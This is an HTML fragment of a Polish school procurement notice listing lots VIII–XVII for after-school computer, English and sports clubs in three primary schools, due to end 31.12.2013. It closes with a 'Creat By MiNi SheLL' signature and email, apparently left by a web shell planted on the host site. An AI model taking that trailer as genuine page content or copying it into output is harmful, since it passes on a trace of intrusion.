<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Część VIII - Realizacja zajęć koła informatycznego w Szkole Podstawowej w Krześlinie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą obejmować uczniów z kl. IV-VI, odbywać się będą cyklicznie, raz w miesiącu, w sobotę przez 2 godziny, zgodnie z organizacją roku szkolnego, z wyłączeniem ferii zimowych i wakacji letnich. Łącznie godzin lekcyjnych ( godzina lekcyjna = 45 minut) - 20 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Część IX - Realizacja zajęć koła informatycznego w Szkole Podstawowej w Suchożebrach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą obejmować uczniów z kl. IV-VI, odbywać się będą cyklicznie, raz w miesiącu, w sobotę przez 2 godziny, zgodnie z organizacją roku szkolnego, z wyłączeniem ferii zimowych i wakacji letnich. Łącznie godzin lekcyjnych ( godzina lekcyjna = 45 minut) - 28 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Część X - Realizacja zajęć koła informatycznego w Szkole Podstawowej w Suchożebrach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą obejmować uczniów z kl. IV-VI, odbywać się będą cyklicznie, raz w miesiącu, w sobotę przez 2 godziny, zgodnie z organizacją roku szkolnego, z wyłączeniem ferii zimowych i wakacji letnich. Łącznie godzin lekcyjnych ( godzina lekcyjna = 45 minut) - 28 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Część XI - Realizacja zajęć koła języka angielskiego w Szkole Podstawowej w Krynicy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą obejmować uczniów z kl. IV-VI, odbywać się będą cyklicznie,  w wymiarze 3 godziny w miesiącu, przeciętnie 1 godz./ tyg., od poniedziałku do piątku, zgodnie z organizacją roku szkolnego, z wyłączeniem ferii zimowych i wakacji letnich. Łącznie godzin lekcyjnych 
( godzina lekcyjna = 45 minut) - 42 godziny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Część XII - Realizacja zajęć koła języka angielskiego w Szkole Podstawowej w Krześlinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą obejmować uczniów z kl. IV-VI, odbywać się będą cyklicznie,  w wymiarze 3 godziny w miesiącu, przeciętnie 1 godz./ tyg., od poniedziałku do piątku, zgodnie z organizacją roku szkolnego, z wyłączeniem ferii zimowych i wakacji letnich. Łącznie godzin lekcyjnych ( godzina lekcyjna = 45 minut) - 30 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Część XIII - Realizacja zajęć koła języka angielskiego w Szkole Podstawowej w Suchożebrach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą obejmować uczniów z kl. IV-VI, odbywać się będą cyklicznie,  w wymiarze 6 godzin w miesiącu, przeciętnie 1-2 godz./ tyg., od poniedziałku do piątku, zgodnie z organizacją roku szkolnego, z wyłączeniem ferii zimowych i wakacji letnich. Łącznie godzin lekcyjnych 
( godzina lekcyjna = 45 minut) - 84 godziny.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Część XIV - Realizacja zajęć koła sportowego w Szkole Podstawowej w Krynicy..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą obejmować uczniów z kl. IV-VI, odbywać się będą cyklicznie, raz w miesiącu, w sobotę przez 2 godziny, zgodnie z organizacją roku szkolnego, z wyłączeniem ferii zimowych i wakacji letnich. Łącznie godzin lekcyjnych ( godzina lekcyjna = 45 minut) - 28 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Część XV - Realizacja zajęć koła sportowego w Szkole Podstawowej w Krześlinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą obejmować uczniów z kl. IV-VI, odbywać się będą cyklicznie, raz w miesiącu, w sobotę przez 2 godziny, zgodnie z organizacją roku szkolnego, z wyłączeniem ferii zimowych i wakacji letnich. Łącznie godzin lekcyjnych ( godzina lekcyjna = 45 minut) - 20 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Część XVI - Realizacja zajęć koła sportowego w Szkole Podstawowej w Suchożebrach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą obejmować uczniów z kl. IV-VI, odbywać się będą cyklicznie, raz w miesiącu, w sobotę przez 2 godziny, zgodnie z organizacją roku szkolnego, z wyłączeniem ferii zimowych i wakacji letnich. Łącznie godzin lekcyjnych ( godzina lekcyjna = 45 minut) - 28 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Część XVII - Realizacja zajęć koła sportowego w Szkole Podstawowej w Suchożebrach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zajęcia będą obejmować uczniów z kl. IV-VI, odbywać się będą cyklicznie, raz w miesiącu, w sobotę przez 2 godziny, zgodnie z organizacją roku szkolnego, z wyłączeniem ferii zimowych i wakacji letnich. Łącznie godzin lekcyjnych ( godzina lekcyjna = 45 minut) - 28 godzin.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com